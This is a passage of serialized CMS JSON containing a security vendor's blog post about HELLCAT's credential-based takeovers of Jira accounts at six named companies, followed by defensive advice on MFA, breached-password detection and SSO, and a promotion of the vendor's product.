10,"nodeType":173},{},[76572],{"type":370},{"data":76574,"content":76575,"nodeType":178},{},[76576],{"data":76577,"marks":76578,"value":4317,"nodeType":173},{},[],{"data":76580,"content":76581,"nodeType":178},{},[76582],{"data":76583,"marks":76584,"value":4324,"nodeType":173},{},[],{"data":76586,"content":76587,"nodeType":235},{},[76588],{"data":76589,"marks":76590,"value":4332,"nodeType":173},{},[76591],{"type":370},{"data":76593,"content":76594,"nodeType":178},{},[76595,76598,76605],{"data":76596,"marks":76597,"value":4339,"nodeType":173},{},[],{"data":76599,"content":76600,"nodeType":186},{"uri":4342},[76601],{"data":76602,"marks":76603,"value":835,"nodeType":173},{},[76604],{"type":194},{"data":76606,"marks":76607,"value":197,"nodeType":173},{},[],{"data":76609,"content":76610,"nodeType":178},{},[76611],{"data":76612,"marks":76613,"value":4357,"nodeType":173},{},[],{"data":76615,"content":76616,"nodeType":235},{},[76617],{"data":76618,"marks":76619,"value":4365,"nodeType":173},{},[76620],{"type":370},{"data":76622,"content":76623,"nodeType":178},{},[76624],{"data":76625,"marks":76626,"value":4372,"nodeType":173},{},[],{"data":76628,"content":76629,"nodeType":178},{},[76630],{"data":76631,"marks":76632,"value":4379,"nodeType":173},{},[],{"data":76634,"content":76635,"nodeType":235},{},[76636],{"data":76637,"marks":76638,"value":4387,"nodeType":173},{},[76639],{"type":370},{"data":76641,"content":76642,"nodeType":178},{},[76643],{"data":76644,"marks":76645,"value":4394,"nodeType":173},{},[],{"data":76647,"content":76648,"nodeType":178},{},[76649],{"data":76650,"marks":76651,"value":4401,"nodeType":173},{},[],{"data":76653,"content":76654,"nodeType":178},{},[76655,76658,76665],{"data":76656,"marks":76657,"value":4408,"nodeType":173},{},[],{"data":76659,"content":76660,"nodeType":186},{"uri":4411},[76661],{"data":76662,"marks":76663,"value":4417,"nodeType":173},{},[76664],{"type":194},{"data":76666,"marks":76667,"value":4421,"nodeType":173},{},[],{"data":76669,"content":76672,"nodeType":312},{"target":76670},{"sys":76671},{"id":4426,"type":317,"linkType":318},[],{"data":76674,"content":76675,"nodeType":231},{},[],{"data":76677,"content":76678,"nodeType":169},{},[76679],{"data":76680,"marks":76681,"value":4438,"nodeType":173},{},[76682],{"type":370},{"data":76684,"content":76685,"nodeType":235},{},[76686],{"data":76687,"marks":76688,"value":4446,"nodeType":173},{},[76689],{"type":370},{"data":76691,"content":76692,"nodeType":178},{},[76693],{"data":76694,"marks":76695,"value":4453,"nodeType":173},{},[],{"data":76697,"content":76698,"nodeType":250},{},[76699,76718,76737,76766],{"data":76700,"content":76701,"nodeType":254},{},[76702],{"data":76703,"content":76704,"nodeType":178},{},[76705,76708,76715],{"data":76706,"marks":76707,"value":4466,"nodeType":173},{},[],{"data":76709,"content":76710,"nodeType":186},{"uri":4469},[76711],{"data":76712,"marks":76713,"value":4475,"nodeType":173},{},[76714],{"type":194},{"data":76716,"marks":76717,"value":4479,"nodeType":173},{},[],{"data":76719,"content":76720,"nodeType":254},{},[76721],{"data":76722,"content":76723,"nodeType":178},{},[76724,76727,76734],{"data":76725,"marks":76726,"value":4489,"nodeType":173},{},[],{"data":76728,"content":76729,"nodeType":186},{"uri":4492},[76730],{"data":76731,"marks":76732,"value":4498,"nodeType":173},{},[76733],{"type":194},{"data":76735,"marks":76736,"value":1477,"nodeType":173},{},[],{"data":76738,"content":76739,"nodeType":254},{},[76740],{"data":76741,"content":76742,"nodeType":178},{},[76743,76746,76753,76756,76763],{"data":76744,"marks":76745,"value":4511,"nodeType":173},{},[],{"data":76747,"content":76748,"nodeType":186},{"uri":4342},[76749],{"data":76750,"marks":76751,"value":4519,"nodeType":173},{},[76752],{"type":194},{"data":76754,"marks":76755,"value":4523,"nodeType":173},{},[],{"data":76757,"content":76758,"nodeType":186},{"uri":4526},[76759],{"data":76760,"marks":76761,"value":4532,"nodeType":173},{},[76762],{"type":194},{"data":76764,"marks":76765,"value":4536,"nodeType":173},{},[],{"data":76767,"content":76768,"nodeType":254},{},[76769],{"data":76770,"content":76771,"nodeType":178},{},[76772,76775,76782],{"data":76773,"marks":76774,"value":4546,"nodeType":173},{},[],{"data":76776,"content":76777,"nodeType":186},{"uri":4492},[76778],{"data":76779,"marks":76780,"value":4554,"nodeType":173},{},[76781],{"type":194},{"data":76783,"marks":76784,"value":4558,"nodeType":173},{},[],{"data":76786,"content":76787,"nodeType":178},{},[76788],{"data":76789,"marks":76790,"value":4565,"nodeType":173},{},[],{"data":76792,"content":76793,"nodeType":235},{},[76794],{"data":76795,"marks":76796,"value":4573,"nodeType":173},{},[76797],{"type":370},{"data":76799,"content":76800,"nodeType":178},{},[76801],{"data":76802,"marks":76803,"value":4580,"nodeType":173},{},[],{"data":76805,"content":76806,"nodeType":178},{},[76807],{"data":76808,"marks":76809,"value":4587,"nodeType":173},{},[],{"data":76811,"content":76814,"nodeType":312},{"target":76812},{"sys":76813},{"id":4592,"type":317,"linkType":318},[],{"data":76816,"content":76817,"nodeType":235},{},[76818],{"data":76819,"marks":76820,"value":4601,"nodeType":173},{},[76821],{"type":370},{"data":76823,"content":76824,"nodeType":178},{},[76825],{"data":76826,"marks":76827,"value":4608,"nodeType":173},{},[],{"data":76829,"content":76830,"nodeType":178},{},[76831],{"data":76832,"marks":76833,"value":4615,"nodeType":173},{},[],{"data":76835,"content":76836,"nodeType":178},{},[76837],{"data":76838,"marks":76839,"value":4622,"nodeType":173},{},[],{"data":76841,"content":76842,"nodeType":235},{},[76843],{"data":76844,"marks":76845,"value":4630,"nodeType":173},{},[76846],{"type":370},{"data":76848,"content":76849,"nodeType":178},{},[76850],{"data":76851,"marks":76852,"value":4637,"nodeType":173},{},[],{"data":76854,"content":76855,"nodeType":178},{},[76856],{"data":76857,"marks":76858,"value":4644,"nodeType":173},{},[],{"data":76860,"content":76861,"nodeType":178},{},[76862],{"data":76863,"marks":76864,"value":4651,"nodeType":173},{},[],{"data":76866,"content":76867,"nodeType":178},{},[76868],{"data":76869,"marks":76870,"value":4658,"nodeType":173},{},[],{"data":76872,"content":76875,"nodeType":312},{"target":76873},{"sys":76874},{"id":4663,"type":317,"linkType":318},[],{"data":76877,"content":76878,"nodeType":231},{},[],{"data":76880,"content":76881,"nodeType":169},{},[76882],{"data":76883,"marks":76884,"value":4675,"nodeType":173},{},[76885],{"type":370},{"data":76887,"content":76888,"nodeType":178},{},[76889],{"data":76890,"marks":76891,"value":4682,"nodeType":173},{},[],{"data":76893,"content":76894,"nodeType":250},{},[76895,76904,76913],{"data":76896,"content":76897,"nodeType":254},{},[76898],{"data":76899,"content":76900,"nodeType":178},{},[76901],{"data":76902,"marks":76903,"value":4695,"nodeType":173},{},[],{"data":76905,"content":76906,"nodeType":254},{},[76907],{"data":76908,"content":76909,"nodeType":178},{},[76910],{"data":76911,"marks":76912,"value":4705,"nodeType":173},{},[],{"data":76914,"content":76915,"nodeType":254},{},[76916],{"data":76917,"content":76918,"nodeType":178},{},[76919],{"data":76920,"marks":76921,"value":4715,"nodeType":173},{},[],{"data":76923,"content":76924,"nodeType":178},{},[76925],{"data":76926,"marks":76927,"value":4722,"nodeType":173},{},[],{"data":76929,"content":76930,"nodeType":178},{},[76931,76934,76940],{"data":76932,"marks":76933,"value":4729,"nodeType":173},{},[],{"data":76935,"content":76936,"nodeType":186},{"uri":4732},[76937],{"data":76938,"marks":76939,"value":4737,"nodeType":173},{},[],{"data":76941,"marks":76942,"value":4741,"nodeType":173},{},[],{"data":76944,"content":76945,"nodeType":178},{},[76946,76949,76956],{"data":76947,"marks":76948,"value":4748,"nodeType":173},{},[],{"data":76950,"content":76951,"nodeType":186},{"uri":4751},[76952],{"data":76953,"marks":76954,"value":4757,"nodeType":173},{},[76955],{"type":194},{"data":76957,"marks":76958,"value":4761,"nodeType":173},{},[],{"data":76960,"content":76963,"nodeType":312},{"target":76961},{"sys":76962},{"id":4766,"type":317,"linkType":318},[],{"data":76965,"content":76966,"nodeType":178},{},[76967],{"data":76968,"marks":76969,"value":37,"nodeType":173},{},[],{"items":76971},[76972],{"sys":76973,"name":505},{"id":504},{"items":76975},[76976],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":76977},{"url":1496},{"__typename":1528,"sys":76979,"content":76980,"title":46302,"synopsis":77668,"hashTags":118,"publishedDate":77669,"slug":46303,"tagsCollection":77670,"authorsCollection":77676},{"id":24631},{"json":76981},{"nodeType":165,"data":76982,"content":76983},{},[76984,77000,77006,77012,77018,77021,77029,77036,77129,77135,77142,77149,77152,77160,77168,77175,77228,77236,77253,77282,77289,77297,77304,77310,77329,77345,77351,77358,77384,77391,77398,77431,77438,77445,77464,77467,77475,77482,77489,77496,77504,77524,77529,77537,77556,77574,77580,77588,77595,77613,77620,77626,77629,77637,77644,77651],{"nodeType":178,"data":76985,"content":76986},{},[76987,76991,76996],{"nodeType":173,"value":76988,"marks":76989,"data":76990},"Since late 2024, attackers have been targeting organizations using Jira, the project management tool, taking over user accounts using compromised credentials. This has resulted in ",[],{},{"nodeType":173,"value":76992,"marks":76993,"data":76995},"six public breaches in five months",[76994],{"type":370},{},{"nodeType":173,"value":76997,"marks":76998,"data":76999}," where criminals made off with sensitive data and documentation, profiting by extorting the victims and selling the data on criminal forums. ",[],{},{"nodeType":312,"data":77001,"content":77005},{"target":77002},{"sys":77003},{"id":77004,"type":317,"linkType":318},"3QJBi8NiId1CccFmJrp8pu",[],{"nodeType":178,"data":77007,"content":77008},{},[77009],{"nodeType":173,"value":37,"marks":77010,"data":77011},[],{},{"nodeType":312,"data":77013,"content":77017},{"target":77014},{"sys":77015},{"id":77016,"type":317,"linkType":318},"79uXXgsAuOK9dKwYQFb0d1",[],{"nodeType":231,"data":77019,"content":77020},{},[],{"nodeType":169,"data":77022,"content":77023},{},[77024],{"nodeType":173,"value":77025,"marks":77026,"data":77028},"What happened?",[77027],{"type":370},{},{"nodeType":178,"data":77030,"content":77031},{},[77032],{"nodeType":173,"value":77033,"marks":77034,"data":77035},"Six attacks where stolen credentials were used to compromise the victim’s Jira tenant have been reported since November 2024, all attributed to operators belonging to the HELLCAT threat group. ",[],{},{"nodeType":250,"data":77037,"content":77038},{},[77039,77054,77069,77084,77099,77114],{"nodeType":254,"data":77040,"content":77041},{},[77042],{"nodeType":178,"data":77043,"content":77044},{},[77045,77050],{"nodeType":173,"value":77046,"marks":77047,"data":77049},"Affinitiv (March 2025): ",[77048],{"type":370},{},{"nodeType":173,"value":77051,"marks":77052,"data":77053},"Attackers stole a database containing over 470k unique emails and 780k records from marketing data analytics provider Affinitiv. ",[],{},{"nodeType":254,"data":77055,"content":77056},{},[77057],{"nodeType":178,"data":77058,"content":77059},{},[77060,77065],{"nodeType":173,"value":77061,"marks":77062,"data":77064},"Ascom (March 2025):",[77063],{"type":370},{},{"nodeType":173,"value":77066,"marks":77067,"data":77068}," Attackers stole 44GB of data including source code for multiple products, details about various projects, invoices, confidential documents, and issues from the ticketing system from global telecommunications provider Ascom.",[],{},{"nodeType":254,"data":77070,"content":77071},{},[77072],{"nodeType":178,"data":77073,"content":77074},{},[77075,77080],{"nodeType":173,"value":77076,"marks":77077,"data":77079},"Jaguar Land Rover (March 2025):",[77078],{"type":370},{},{"nodeType":173,"value":77081,"marks":77082,"data":77083}," Attackers leaked ~700 internal documents totalling several GBs of data, including proprietary documents, source code, and employee and partner data, from vehicle manufacturer Jaguar Land Rover. The breach was linked to credentials stolen by infostealers in 2021. A second threat actor is now alleged to have re-compromized Jaguar using the same credentials and achieved a much bigger breach of ~350GB. ",[],{},{"nodeType":254,"data":77085,"content":77086},{},[77087],{"nodeType":178,"data":77088,"content":77089},{},[77090,77095],{"nodeType":173,"value":77091,"marks":77092,"data":77094},"Orange (February 2025):",[77093],{"type":370},{},{"nodeType":173,"value":77096,"marks":77097,"data":77098}," Attackers stole almost 12,000 files totaling close to 6.5GB, which includes 380k unique email addresses, source code, invoices, contracts, customer and employee information, from telecommunications provider Orange. The attacker allegedly had access to the systems for over a month before exfiltrating company data.",[],{},{"nodeType":254,"data":77100,"content":77101},{},[77102],{"nodeType":178,"data":77103,"content":77104},{},[77105,77110],{"nodeType":173,"value":77106,"marks":77107,"data":77109},"Telefonica (January 2025): ",[77108],{"type":370},{},{"nodeType":173,"value":77111,"marks":77112,"data":77113},"Attackers stole 2.3GB of documents, tickets, and various data from telecommunications provider Telefonica. ",[],{},{"nodeType":254,"data":77115,"content":77116},{},[77117],{"nodeType":178,"data":77118,"content":77119},{},[77120,77125],{"nodeType":173,"value":77121,"marks":77122,"data":77124},"Schneider Electric (November 2024): ",[77123],{"type":370},{},{"nodeType":173,"value":77126,"marks":77127,"data":77128},"Attackers stole 40GB of data including 75k unique email addresses, from manufacturing provider Schneider Electric, demanding a ransom payment of $125k. ",[],{},{"nodeType":312,"data":77130,"content":77134},{"target":77131},{"sys":77132},{"id":77133,"type":317,"linkType":318},"1Hm5x8QlQnJsUPgFyCkeFO",[],{"nodeType":178,"data":77136,"content":77137},{},[77138],{"nodeType":173,"value":77139,"marks":77140,"data":77141},"So, hundreds of gigabytes of data and thousands of breached records — all from logging in with a single set of stolen credentials for each victim. There are clear signs that these attacks are ramping up in frequency and impact too, with three of the breaches occurring in March alone. ",[],{},{"nodeType":178,"data":77143,"content":77144},{},[77145],{"nodeType":173,"value":77146,"marks":77147,"data":77148},"These attacks all follow the same pattern, revolving around initial access to Jira accounts using compromised credentials. Once inside, the attacker has been reported to use integrated Atlassian tools like MiniOrange to scrape customer and employee data. After dumping the data, they attempt to extort a ransom payment for the deletion of the data, and when that fails, sell it on criminal marketplaces such as dark web forums and Telegram channels. HELLCAT is also responsible for a Ransomware-as-a-Service (RaaS) offering using a custom ransomware strain. ",[],{},{"nodeType":231,"data":77150,"content":77151},{},[],{"nodeType":169,"data":77153,"content":77154},{},[77155],{"nodeType":173,"value":77156,"marks":77157,"data":77159},"Why are attackers targeting Jira?",[77158],{"type":370},{},{"nodeType":235,"data":77161,"content":77162},{},[77163],{"nodeType":173,"value":77164,"marks":77165,"data":77167},"It’s a goldmine for attackers",[77166],{"type":370},{},{"nodeType":178,"data":77169,"content":77170},{},[77171],{"nodeType":173,"value":77172,"marks":77173,"data":77174},"Apps like Jira are a goldmine for cyber attackers. For organizations using it, Jira is a central technology that underpins core business workflows. It’s used for pretty much all aspects of project management across functions, meaning it:",[],{},{"nodeType":250,"data":77176,"content":77177},{},[77178,77188,77198,77208,77218],{"nodeType":254,"data":77179,"content":77180},{},[77181],{"nodeType":178,"data":77182,"content":77183},{},[77184],{"nodeType":173,"value":77185,"marks":77186,"data":77187},"Stores huge amounts of sensitive data, from strategic business initiatives to sensitive customer data. ",[],{},{"nodeType":254,"data":77189,"content":77190},{},[77191],{"nodeType":178,"data":77192,"content":77193},{},[77194],{"nodeType":173,"value":77195,"marks":77196,"data":77197},"Contains detailed information on IT infrastructure and architecture. It often acts as an issue tracker for vulnerabilities, and frequently contains credentials and secrets accidentally pasted into tickets, enabling lateral movement and further exploitation. ",[],{},{"nodeType":254,"data":77199,"content":77200},{},[77201],{"nodeType":178,"data":77202,"content":77203},{},[77204],{"nodeType":173,"value":77205,"marks":77206,"data":77207},"Has deep integrations with other Cloud and DevOps technologies like GitHub repos (also a frequent target for attackers), Bitbucket, Jenkins, CircleCI, AWS, Azure, etc. ",[],{},{"nodeType":254,"data":77209,"content":77210},{},[77211],{"nodeType":178,"data":77212,"content":77213},{},[77214],{"nodeType":173,"value":77215,"marks":77216,"data":77217},"Can be exploited using native functionality by, for example, creating automated workflows containing malicious scripts or deployments, or inserting malicious links into tickets to phish users in-app. ",[],{},{"nodeType":254,"data":77219,"content":77220},{},[77221],{"nodeType":178,"data":77222,"content":77223},{},[77224],{"nodeType":173,"value":77225,"marks":77226,"data":77227},"Also provides access to the broader Atlassian suite through a compromised Jira account, e.g. Confluence, Bitbucket, Trello, Opsgenie, etc. ",[],{},{"nodeType":235,"data":77229,"content":77230},{},[77231],{"nodeType":173,"value":77232,"marks":77233,"data":77235},"Compromised credentials are waiting to be exploited",[77234],{"type":370},{},{"nodeType":178,"data":77237,"content":77238},{},[77239,77242,77249],{"nodeType":173,"value":37,"marks":77240,"data":77241},[],{},{"nodeType":186,"data":77243,"content":77244},{"uri":1297},[77245],{"nodeType":173,"value":77246,"marks":77247,"data":77248},"Stolen credentials were the #1 attacker action in 2023/24",[],{},{"nodeType":173,"value":77250,"marks":77251,"data":77252},", and the breach vector for 80% of web app attacks. Not surprising when you consider the fact that billions of leaked credentials are in circulation online, and attackers can pick up the latest drop for as little as $10 on criminal forums. ",[],{},{"nodeType":178,"data":77254,"content":77255},{},[77256,77260,77268,77272,77278],{"nodeType":173,"value":77257,"marks":77258,"data":77259},"The criminal marketplace for stolen credentials is booming, fuelled by an unprecedented rise in infostealer activity as attackers look to replicate the success of ",[],{},{"nodeType":186,"data":77261,"content":77263},{"uri":77262},"https://pushsecurity.com/resources/2024-identity-attacks",[77264],{"nodeType":173,"value":77265,"marks":77266,"data":77267},"high profile breaches in 2024",[],{},{"nodeType":173,"value":77269,"marks":77270,"data":77271}," such as the attacks on ",[],{},{"nodeType":186,"data":77273,"content":77274},{"uri":819},[77275],{"nodeType":173,"value":27706,"marks":77276,"data":77277},[],{},{"nodeType":173,"value":77279,"marks":77280,"data":77281}," customers — where 165 customer tenants and hundreds of millions of breached records were compromised using credentials dating found in infostealer credential dumps dating as far back as 2020.",[],{},{"nodeType":178,"data":77283,"content":77284},{},[77285],{"nodeType":173,"value":77286,"marks":77287,"data":77288},"Like Snowflake, attackers have clearly noticed that compromised credentials are a reliable way to access Jira accounts. And the more these attacks succeed, the stronger the signal for other attackers to look for insecure identities. ",[],{},{"nodeType":235,"data":77290,"content":77291},{},[77292],{"nodeType":173,"value":77293,"marks":77294,"data":77296},"But wait: This isn’t just a Jira problem",[77295],{"type":370},{},{"nodeType":178,"data":77298,"content":77299},{},[77300],{"nodeType":173,"value":77301,"marks":77302,"data":77303},"If an organization isn’t relying on Jira, they’re probably using a product with similar functionality such as ServiceNow, Asana, Zendesk, Notion, Oracle, etc. These alternatives are an equally viable target for attackers. ",[],{},{"nodeType":312,"data":77305,"content":77309},{"target":77306},{"sys":77307},{"id":77308,"type":317,"linkType":318},"4hgYhQiAykupZ6n7Js2zJA",[],{"nodeType":178,"data":77311,"content":77312},{},[77313,77317,77325],{"nodeType":173,"value":77314,"marks":77315,"data":77316},"Jira and many apps like it, fall into a category where it’s a core business app, but isn’t as well-secured (or can’t be configured as securely) as full enterprise cloud platforms — increasing the likelihood that accounts are using weak, breached, or reused credentials, and have gaps in MFA coverage. Again, there are clear similarities with the attacks on Snowflake customers last year. And more recently, breaches like ",[],{},{"nodeType":186,"data":77318,"content":77320},{"uri":77319},"https://www.bleepingcomputer.com/news/security/oracle-denies-data-breach-after-hacker-claims-theft-of-6-million-data-records/",[77321],{"nodeType":173,"value":77322,"marks":77323,"data":77324},"the theft of 6 million Oracle records",[],{},{"nodeType":173,"value":77326,"marks":77327,"data":77328}," (including  passwords) provide plenty of fuel for attackers looking to take advantage of unsecured accounts. ",[],{},{"nodeType":178,"data":77330,"content":77331},{},[77332,77336,77341],{"nodeType":173,"value":77333,"marks":77334,"data":77335},"Using Push data, we compared the posture of accounts that ",[],{},{"nodeType":173,"value":77337,"marks":77338,"data":77340},"use a password to log in",[77339],{"type":370},{},{"nodeType":173,"value":77342,"marks":77343,"data":77344}," when organizations first begin using our platform.",[],{},{"nodeType":312,"data":77346,"content":77350},{"target":77347},{"sys":77348},{"id":77349,"type":317,"linkType":318},"4xOUAqait2RG4IH00vh2RM",[],{"nodeType":178,"data":77352,"content":77353},{},[77354],{"nodeType":173,"value":77355,"marks":77356,"data":77357},"Clearly, this isn’t just a Jira problem — and it won’t be long before attackers take advantage. ",[],{},{"nodeType":178,"data":77359,"content":77360},{},[77361,77364,77372,77376,77381],{"nodeType":173,"value":37,"marks":77362,"data":77363},[],{},{"nodeType":186,"data":77365,"content":77366},{"uri":4492},[77367],{"nodeType":173,"value":77368,"marks":77369,"data":77371},"These stats are in the ballpark of our average findings from across all apps",[77370],{"type":194},{},{"nodeType":173,"value":77373,"marks":77374,"data":77375}," — with 2 in 5 identities using a password to log in AND missing MFA, rising to 4 in 5 when a password is the sole login method. Considering the fact that organizations are using hundreds of apps (220+ on average), ",[],{},{"nodeType":173,"value":77377,"marks":77378,"data":77380},"there are many, many more apps that can be targeted in a similar way to Jira",[77379],{"type":370},{},{"nodeType":173,"value":197,"marks":77382,"data":77383},[],{},{"nodeType":169,"data":77385,"content":77386},{},[77387],{"nodeType":173,"value":77388,"marks":77389,"data":77390},"Preventing account takeover with stolen credentials",[],{},{"nodeType":178,"data":77392,"content":77393},{},[77394],{"nodeType":173,"value":77395,"marks":77396,"data":77397},"To ensure that your workforce identities can’t be compromised using stolen credentials, you need to:",[],{},{"nodeType":250,"data":77399,"content":77400},{},[77401,77411,77421],{"nodeType":254,"data":77402,"content":77403},{},[77404],{"nodeType":178,"data":77405,"content":77406},{},[77407],{"nodeType":173,"value":77408,"marks":77409,"data":77410},"Ensure MFA is configured for all user accounts. ",[],{},{"nodeType":254,"data":77412,"content":77413},{},[77414],{"nodeType":178,"data":77415,"content":77416},{},[77417],{"nodeType":173,"value":77418,"marks":77419,"data":77420},"Ensure employees are not using weak, breached, or stolen passwords. ",[],{},{"nodeType":254,"data":77422,"content":77423},{},[77424],{"nodeType":178,"data":77425,"content":77426},{},[77427],{"nodeType":173,"value":77428,"marks":77429,"data":77430},"Where possible, ensure users are using SSO to log in via your preferred identity provider (IdP).",[],{},{"nodeType":178,"data":77432,"content":77433},{},[77434],{"nodeType":173,"value":77435,"marks":77436,"data":77437},"This is a tricky problem to solve in Jira itself. Jira doesn’t provide the capabilities to enforce these controls — to get access to some of the required functionality, like being able to require MFA for all users within your tenant, enforce SSO logins, or see if a user has MFA enabled, you need Atlassian Access — a separate tier of identity management product for Atlassian. Even then, you can’t do things like centrally administer password resets. ",[],{},{"nodeType":178,"data":77439,"content":77440},{},[77441],{"nodeType":173,"value":77442,"marks":77443,"data":77444},"And as we’ve pointed out — this isn’t just a Jira problem. Very few apps provide this level of identity visibility and control (even at the premium tier) — so what about when the next app hits the headlines? ",[],{},{"nodeType":178,"data":77446,"content":77447},{},[77448,77452,77460],{"nodeType":173,"value":77449,"marks":77450,"data":77451},"You could ingest a compromised credential TI feed to get some visibility of what’s out there, but then you’re relying on asking every user with a breached password to change it (not really reliable or enforceable!). When we ",[],{},{"nodeType":186,"data":77453,"content":77454},{"uri":62639},[77455],{"nodeType":173,"value":77456,"marks":77457,"data":77459},"recently reviewed a range of TI feeds against our identity data set",[77458],{"type":194},{},{"nodeType":173,"value":77461,"marks":77462,"data":77463},", we found that less than 1% of the data was valid — like looking for a needle in a haystack. ",[],{},{"nodeType":231,"data":77465,"content":77466},{},[],{"nodeType":169,"data":77468,"content":77469},{},[77470],{"nodeType":173,"value":77471,"marks":77472,"data":77474},"Prevent account takeover with Push",[77473],{"type":370},{},{"nodeType":178,"data":77476,"content":77477},{},[77478],{"nodeType":173,"value":77479,"marks":77480,"data":77481},"Thankfully, there’s a better way. Push provides layered controls to harden your workforce identities against credential attacks, as well as other methods of account takeover like MFA-bypass phishing and session hijacking. Our lightweight, browser-based solution can be deployed in minutes across your entire user base. ",[],{},{"nodeType":178,"data":77483,"content":77484},{},[77485],{"nodeType":173,"value":77486,"marks":77487,"data":77488},"So when a core business app like Jira comes under fire, you can quickly take action to prevent account takeover.  ",[],{},{"nodeType":178,"data":77490,"content":77491},{},[77492],{"nodeType":173,"value":77493,"marks":77494,"data":77495},"Here’s how Push users can protect themselves against the threat of stolen credentials:",[],{},{"nodeType":235,"data":77497,"content":77498},{},[77499],{"nodeType":173,"value":77500,"marks":77501,"data":77503},"Step 1: Deploy MFA across all accounts",[77502],{"type":370},{},{"nodeType":178,"data":77505,"content":77506},{},[77507,77511,77520],{"nodeType":173,"value":77508,"marks":77509,"data":77510},"Whenever an application comes under heavy scrutiny from attackers, it’s a good idea to deploy MFA across all accounts as a first response action. ",[],{},{"nodeType":186,"data":77512,"content":77514},{"uri":77513},"https://pushsecurity.com/blog/enforce-mfa-on-third-party-apps/",[77515],{"nodeType":173,"value":77516,"marks":77517,"data":77519},"Push enables you to quickly find and close MFA gaps",[77518],{"type":194},{},{"nodeType":173,"value":77521,"marks":77522,"data":77523}," by prompting the user to configure MFA when they log in to the app. ",[],{},{"nodeType":312,"data":77525,"content":77528},{"target":77526},{"sys":77527},{"id":71649,"type":317,"linkType":318},[],{"nodeType":235,"data":77530,"content":77531},{},[77532],{"nodeType":173,"value":77533,"marks":77534,"data":77536},"Step 2: Detect when accounts are using stolen credentials and trigger a password change",[77535],{"type":370},{},{"nodeType":178,"data":77538,"content":77539},{},[77540,77544,77552],{"nodeType":173,"value":77541,"marks":77542,"data":77543},"Push integrates with commercial TI feeds to see ",[],{},{"nodeType":186,"data":77545,"content":77546},{"uri":62639},[77547],{"nodeType":173,"value":77548,"marks":77549,"data":77551},"when your employees are actually using a breached password to log in to one of their accounts",[77550],{"type":194},{},{"nodeType":173,"value":77553,"marks":77554,"data":77555},", eliminating manual triage. You can also bring your own TI feed to maximize its value. ",[],{},{"nodeType":178,"data":77557,"content":77558},{},[77559,77563,77571],{"nodeType":173,"value":77560,"marks":77561,"data":77562},"When a stolen credential (or any other password vulnerability) is found, the next time they log into the app they will be prompted to change it via the ",[],{},{"nodeType":186,"data":77564,"content":77566},{"uri":77565},"https://pushsecurity.com/blog/introducing-strong-password-enforcement/",[77567],{"nodeType":173,"value":77568,"marks":77569,"data":77570},"strong password enforcement feature",[],{},{"nodeType":173,"value":197,"marks":77572,"data":77573},[],{},{"nodeType":312,"data":77575,"content":77579},{"target":77576},{"sys":77577},{"id":77578,"type":317,"linkType":318},"shpVOAMlk7OE1mWrE9h8S",[],{"nodeType":235,"data":77581,"content":77582},{},[77583],{"nodeType":173,"value":77584,"marks":77585,"data":77587},"Step 3: Ensure employees are using SSO (and remediate ghost logins)",[77586],{"type":370},{},{"nodeType":178,"data":77589,"content":77590},{},[77591],{"nodeType":173,"value":77592,"marks":77593,"data":77594},"Once you’ve secured your accounts against the risk of immediate account takeover, you can harden them further by ensuring that accounts are using your preferred SSO method and IdP. ",[],{},{"nodeType":178,"data":77596,"content":77597},{},[77598,77602,77609],{"nodeType":173,"value":77599,"marks":77600,"data":77601},"[Insight box: It’s not enough to have users adopt SSO, however. Local username and password accounts can continue to exist and be used alongside SSO unless specifically configured (and configurable) within the app. These local accounts are a form of ",[],{},{"nodeType":186,"data":77603,"content":77604},{"uri":4342},[77605],{"nodeType":173,"value":4519,"marks":77606,"data":77608},[77607],{"type":194},{},{"nodeType":173,"value":77610,"marks":77611,"data":77612},", providing backdoor access to your business apps without needing to breach your locked-down IdP accounts used for SSO. This is why it’s important to have MFA set at the application level if local accounts are used — you can’t just rely on your IdP being securely configured.] ",[],{},{"nodeType":178,"data":77614,"content":77615},{},[77616],{"nodeType":173,"value":77617,"marks":77618,"data":77619},"Once you’ve migrated to SSO, it’s best practice to have your employees remove these local accounts so they don’t lie dormant for attackers to take advantage of in the future. You can set an app banner for all users accessing the app, instructing them to log in using SSO, and to disable their local password once they’ve done so.",[],{},{"nodeType":312,"data":77621,"content":77625},{"target":77622},{"sys":77623},{"id":77624,"type":317,"linkType":318},"606mt5mVoJGaMmk82mLIFH",[],{"nodeType":231,"data":77627,"content":77628},{},[],{"nodeType":169,"data":77630,"content":77631},{},[77632],{"nodeType":173,"value":77633,"marks":77634,"data":77636},"Protect and defend your entire identity attack surface",[77635],{"type":370},{},{"nodeType":178,"data":77638,"content":77639},{},[77640],{"nodeType":173,"value":77641,"marks":77642,"data":77643},"Push provides comprehensive identity attack detection and response capabilities across every app and workforce identity.    ",[],{},{"nodeType":178,"data":77645,"content":77646},{},[77647],{"nodeType":173,"value":77648,"marks":77649,"data":77650},"We stop attacks like MFA-bypass phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",[],{},{"nodeType":178,"data":77652,"content":77653},{},[77654,77657,77664],{"nodeType":173,"value":61741,"marks":77655,"data":77656},[],{},{"nodeType":186,"data":77658,"content":77660},{"uri":77659},"https://pushsecurity.com/demo?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[77661],{"nodeType":173,"value":476,"marks":77662,"data":77663},[],{},{"nodeType":173,"value":77665,"marks":77666,"data":77667}," for a live demo. ",[],{},"Attackers are persistently targeting Jira accounts with stolen credentials. What can we learn from this 